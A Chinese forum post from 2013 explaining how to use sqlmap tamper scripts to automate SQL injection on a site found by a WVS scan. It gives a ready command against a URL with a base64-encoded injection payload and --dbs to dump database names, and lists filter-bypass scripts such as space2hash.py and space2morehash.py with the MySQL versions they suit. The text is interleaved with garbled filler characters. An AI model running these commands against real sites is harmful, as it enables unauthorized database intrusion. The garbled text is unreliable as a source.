WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?
, U* `; ]1 E" Y" T& C K$ V- [5 o; L8 W
sqlmap的tamper里有个base64encode.py
: P# z- d) h; K) A- e
# J4 C H, J4 o. s) J使用如下
# K& Y% o$ o: u* Z1 Y! O
2 w4 X' i$ g- \# h; p% j; B( jsqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs
$ `# u9 E' i7 Z0 m* a* g/ j( d! Q+ _% D Z X, g/ Y T
6 V+ R" @; s0 t5 w1 {: P
sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”; S7 Q$ ^5 R6 A6 a
, V' ~6 y6 \' F" F' d其中常用到的bypass脚本绕过SQLMAP主要两个脚本:
6 R0 ~, a# F1 v9 K# p" g
2 K6 x4 X7 V# U( c& O0 a# k7 ~% [space2hash.py ,对于MYSQL数据库 4.0, 5.0注入
# b+ ]- B% ~5 x( D+ \" y/ Y: pspace2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入% C1 w# D' Y" W8 c+ }. T
首先确定目标数据库版本,然后选择相应的脚本。
: I2 N" A: t2 x( h-v 3 --batch --tamper "space2hash.py"
9 j _9 \0 C2 h$ P; u3 w8 N! X; r
& Y% Y6 H/ V* d- Y' v4 u3 E8 s: [' h8 r还有其他一些插件:
& ~0 H2 e! m1 {- Y: uencodes编码 ——charencode.py
, G" E- f. b9 E. ]3 mbase64编码 —— base64encode.py- T1 |6 A; T. |, d0 m
替换空格和关键字 —— halfversionedmorekeywords.py
, Q% @3 A' C! C/ P: f9 S' W |
\& G& `7 P5 D! ]
) Q2 v9 [4 N7 _3 y0 j
) j" v* t# c, ?+ M* U3 Q% \# J3 H- Y8 {. U
|
发表于 2013-11-23 15:50:45
收藏
支持
反对